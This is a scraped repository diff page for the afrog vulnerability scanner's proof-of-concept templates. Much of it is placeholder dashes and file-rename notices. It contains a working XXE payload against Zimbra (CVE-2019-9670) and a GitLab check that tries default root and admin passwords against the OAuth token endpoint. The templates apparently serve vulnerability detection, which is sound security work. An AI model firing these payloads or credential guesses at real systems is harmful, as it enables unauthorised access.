Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
Showing first 200 files as there are too many
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
afrog-pocs/cve/2017/CVE-2017-12149.yaml afrog-pocs/CVE/2017/CVE-2017-12149.yamlContent is identical
-
-
afrog-pocs/cve/2017/CVE-2017-12629.yml afrog-pocs/CVE/2017/CVE-2017-12629.yamlContent is identical
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
afrog-pocs/cve/2019/CVE-2019-10758.yml afrog-pocs/CVE/2019/CVE-2019-10758.yamlContent is identical
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
1 - id: zimbra-cve-2019-9670-xxe 1 + id: CVE-2019-9670 2 2 3 3 info: 4 - name: zimbra-cve-2019-9670-xxe 4 + name: Zimbra Collaboration XXE 5 5 author: fnmsd(https://blog.csdn.net/fnmsd) 6 - severity: high 6 + severity: critical 7 7 8 - manual: true 9 - transport: http 10 8 rules: 11 9 r0: 12 10 request: 13 - cache: true 14 11 method: POST 15 12 path: /Autodiscover/Autodiscover.xml 16 13 headers: 17 14 Content-Type: text/xml 18 15 body: <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover> 19 - follow_redirects: false 20 16 expression: response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available") 21 17 expression: r0() 22 18 -
-
-
-
-
-
-
afrog-pocs/unreviewed/saltstack-cve-2020-16846.yml afrog-pocs/CVE/2020/CVE-2020-16846.yamlContent is identical
-
-
-
-
-
-
-
afrog-pocs/cve/2020/CVE-2020-28185.yaml afrog-pocs/CVE/2020/CVE-2020-28185.yamlContent is identical
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
afrog-pocs/cve/2020/CVE-2020-9496.yml afrog-pocs/CVE/2020/CVE-2020-9496.yamlContent is identical
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
afrog-pocs/cve/2022/CVE-2022-25568.yaml afrog-pocs/CVE/2022/CVE-2022-25568.yamlContent is identical
-
-
-
-
-
-
-
-
-
afrog-pocs/login/default-pwd/chinaunicom-default-login.yaml afrog-pocs/default-pwd/chinaunicom-default-login.yamlContent is identical
-
-
-
-
-
skipped 4 lines 5 5 author: Suman_Kar,dwisiswant0 6 6 severity: high 7 7 description: Gitlab default login credentials were discovered. 8 - tags: gitlab,default-login 9 8 reference: 10 9 - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 11 10 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab 12 - metadata: 13 - shodan-query: http.title:"GitLab" 14 - classification: 15 - cwe-id: CWE-798 16 11 17 12 set: 18 13 hostname: request.url.host 19 14 hosturl: request.url 20 - 21 - manual: true 22 - transport: http 23 15 rules: 24 16 r0: 25 17 request: 26 - cache: true 27 18 method: POST 28 19 path: /oauth/token 29 20 headers: skipped 3 lines 33 24 content-type: application/json 34 25 body: | 35 26 {"grant_type":"password","username":"root","password":"5iveL!fe"} 36 - follow_redirects: false 37 27 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 38 28 r1: 39 29 request: 40 - cache: true 41 30 method: POST 42 31 path: /oauth/token 43 32 headers: skipped 3 lines 47 36 content-type: application/json 48 37 body: | 49 38 {"grant_type":"password","username":"root","password":"123456789"} 50 - follow_redirects: false 51 39 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 52 40 r2: 53 41 request: 54 - cache: true 55 42 method: POST 56 43 path: /oauth/token 57 44 headers: skipped 3 lines 61 48 content-type: application/json 62 49 body: | 63 50 {"grant_type":"password","username":"admin","password":"5iveL!fe"} 64 - follow_redirects: false 65 51 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 66 52 r3: 67 53 request: 68 - cache: true 69 54 method: POST 70 55 path: /oauth/token 71 56 headers: skipped 3 lines 75 60 content-type: application/json 76 61 body: | 77 62 {"grant_type":"password","username":"admin","password":"123456789"} 78 - follow_redirects: false 79 63 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 80 64 r4: 81 65 request: 82 - cache: true 83 66 method: POST 84 67 path: /oauth/token 85 68 headers: skipped 3 lines 89 72 content-type: application/json 90 73 body: | 91 74 {"grant_type":"password","username":"[email protected]","password":"5iveL!fe"} 92 - follow_redirects: false 93 75 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 94 76 r5: 95 77 request: 96 - cache: true 97 78 method: POST 98 79 path: /oauth/token 99 80 headers: skipped 3 lines 103 84 content-type: application/json 104 85 body: | 105 86 {"grant_type":"password","username":"[email protected]","password":"123456789"} 106 - follow_redirects: false 107 87 expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":') 108 88 expression: r0() || r1() || r2() || r3() || r4() || r5() 109 89 skipped 1 lines -
-
-
-
-
-
-
-
-
-
-